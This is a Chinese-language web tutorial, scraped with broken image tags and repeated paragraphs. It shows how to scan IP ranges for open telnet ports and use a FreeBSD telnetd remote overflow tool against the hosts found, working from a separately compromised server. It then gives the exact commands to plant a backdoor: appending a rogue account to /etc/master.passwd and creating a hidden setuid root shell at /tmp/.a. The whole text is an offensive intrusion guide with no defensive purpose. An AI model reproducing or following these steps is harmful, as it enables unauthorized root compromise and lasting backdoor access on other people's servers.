superscan:强大的端口扫描器,快速扫描目标
服务
器端口
bsd.exe:FreeBSD
Telnetd的远程溢出程序
一、搜索主机
启动superscan,在IP栏中的开始与停止处,填入起始IP和终止IP,选择搜索23端口,点击开始。去听听音乐,回来后发现扫描完成,出现很多开放23端口的机器,找到返回值是..%的IP。如图1
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
因为FreeBSD远程溢出需要很高的网速,所以我登陆了我的一台开放3389的高速
服务
器上。
打开CMD.exe,进入到有bsd.exe的文件夹,键入bsd -c
IP 来对这台
服务
器进行测试,观察速度足够快。如图2,显示check:PASSED,using 16mb
mode 测试通过!
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
键入bsd -f IP,对FreeBSD
服务
器进行远程溢出!如图
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
命令执行后,会显示溢出完成的百分率以及所剩时间。如果你登陆的
服务
器的带宽足够大,那溢出的时间就会短。如图4
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
当完成了100%后,键入id后按回车键,显示?uid=0(root) gid=0(wheel)
就说明我们已经溢出成功,拥有管理员权限!如图5
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
了保持在这台FreeBSD
服务
器上的权限,需要建立一个属于我们自己的
帐号
,这就用到了下面二行命令。
echo
用户名::92:206::0:0::/:/bin/sh >> /etc/master.passwd
/usr/sbin/pwd_mkdb
/etc/master.passwd
如图6,我建立了一个ID为88的hxf的
帐号
!
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
拥有一个普通
帐号
[1] [2]
并不是我们想要达到的最终目的,我们希望这个建立的
帐号
拥有管理员权限。这就用到了下面三行命令。
cp /bin/sh
/tmp/.a
chmod 777 /tmp/.a
chmod +s /tmp/.a
如图7
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
所有的工作都已经做好了,我们现在打开开始--运行,键入telnet IP
23 按回车键。如图
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
在登陆界面中,我们在login中输入我们刚才建立的
帐号
。如图9
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
出现了“$”号,说明我们已经用刚才建立的普通权限的
帐号
登陆到这台
服务
器。如图10
10
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
执行刚才我们做的后门/tmp/.a 按回车键,看到了吗,漂亮的“#”号出来了,我们已经拥有管理员权限了!如图11
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
(出处:http://www.sheup.com)
[1] [2]
出现了“$”号,说明我们已经用刚才建立的普通权限的
帐号
登陆到这台
服务
器。如图10
10
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
执行刚才我们做的后门/tmp/.a 按回车键,看到了吗,漂亮的“#”号出来了,我们已经拥有管理员权限了!如图11
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
(出处:http://www.sheup.com)
[1] [2] [3]